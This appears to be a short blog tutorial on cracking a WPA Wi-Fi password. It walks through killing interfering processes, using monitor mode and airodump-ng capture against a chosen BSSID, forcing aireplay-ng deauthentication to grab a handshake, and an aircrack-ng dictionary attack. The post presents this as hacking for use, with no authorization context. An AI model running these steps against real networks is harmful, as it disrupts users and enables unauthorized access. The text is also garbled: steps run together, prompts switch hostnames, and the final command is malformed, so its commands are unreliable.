How to Hack WIFI with KALI LINUX

How to Hack WIFI with KALI LINUXhow to hack wifi using linux timesdo the following:1. Aircrack, can be found in here2. Dictionary attackBriefing1. Stop all processes that impede the course of aireplay2. Save the results of monitoring3. Do aireplay to get WPA Handshake4. Crack recordings with a dictionary attack5. gameoverWalkthrough1. Stop all processes that impede the course of aireplaycode:root @ gold: / # airmon-ng check kill2. Create a new interface with monitor mode using airmon-ngcode:root @ gold: / # airmon-ng start wlan03. Monitoring any existing access points around the attackercode:root @ gold: / # airodump-ng mon04. Select the target, then save the results of monitoring Monitoring and airodump.code:root @ red-dragon: / # airodump-ng --write output --channel 6 --bssid 58: 6D: 8F: 3D: 55: E8 mon0Specification:1. --write: serves to store the results of monitoring2. output: the name of the monitoring results are stored [fillable free]3. --chanel: channel access point targets4. --bssid: mac address of the access point5. Run the aireplay-ng to get WPA Handshakecode:root @ gold: / # aireplay-ng --deauth 1 -a 58: 6D: 8F: 3D: 55: E8 -c E0: B9: A5: 9D: 18: 94 mon0Specification:1. --deauth: deautentikasi function for each station on a network access2. -a: mac address of the access point3. -c: mac address of the clientNote:If not appear WPA handshake, change mac address with other clients.code:root @ gold: / # aireplay-ng --deauth 1 -a 58: 6D: 8F: 3D: 55: E8 -c 58: 6D: 8F: 3D: 55: E8 mon06. If you already have WPA handshake from client, the next step is to stop airodump-ng process by pressing ctrl + c, and cracking the password with aircrack-ng.code:root @ gold: / # aircrack-ng-01.cap output -w / root / crack wpa.txtInformation1. The output-01.cap must be adapted to the results of monitoring the name you want on stage 42. -w is the dictionary method, followed by your own dictionary directory.
Previous
Next Post »